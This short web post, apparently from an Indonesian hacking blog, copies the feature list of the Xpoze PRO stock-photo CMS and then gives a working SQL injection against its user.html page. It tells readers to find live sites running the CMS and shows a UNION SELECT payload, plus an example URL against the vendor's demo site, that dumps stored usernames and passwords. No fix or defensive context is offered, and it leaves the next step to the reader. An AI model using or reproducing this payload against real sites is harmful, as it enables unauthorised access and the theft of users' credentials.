Xpoze PRO ?????
Xpoze PRO - The complete solution, easy to use, yet having lots of features to help buyers and sellers to find or sell images after their needs. Main features * SEO friendly URL and TAGS support (using Mod_Rewrite) * Fully Customizable CSS based HTML with TPL pages * Unlimited photos and images * Unlimited Categories & Sub-Categories * Unlimited keywords * Custom Credits * Custom Subscriptions * Simple, Medium and Advanced Search * Custom sorting of all image lists (auto saved for each user) * Multiple download sizes for Stock Photos * Direct File Download * Download Link to Email * Download File to Email * Download Link Auto Expires * Favorite Photos * Post Photo Reviews * Hyper linked keyword search * Admin WYSIWYG Content Editor * Site Statistics * User Account Statistics * Sell Prints & Products * Sell Image Collections * Free Directory * Auto generated thumbnails & Sample pictures * Display Photos By Photographer * Latest Photos Feature .. and lots more
Ada masalah pada user.html CMS XPOZE yang bisa di inject menggunakan sql injection.
Sebagai contoh cari website yang menggunakan XPOZE. Lalu injeksikan /user.html?uid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(user,0×3a,pass)
,19,20,21,22,id,24,25,26,27,29,30,31,32,33+FROM+users+WHERE+id=1/*
Contohnya :
http://demo.xpoze.org/user.html?uid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,concat(user,0×3a,pass)
,19,20,21,22,id,24,25,26,27,29,30,31,32,33+FROM+users+WHERE+id=1/*
Maka akan muncul Username dan Password yang ada. Selanjutnya??? terserah anda… ingat aja dosa.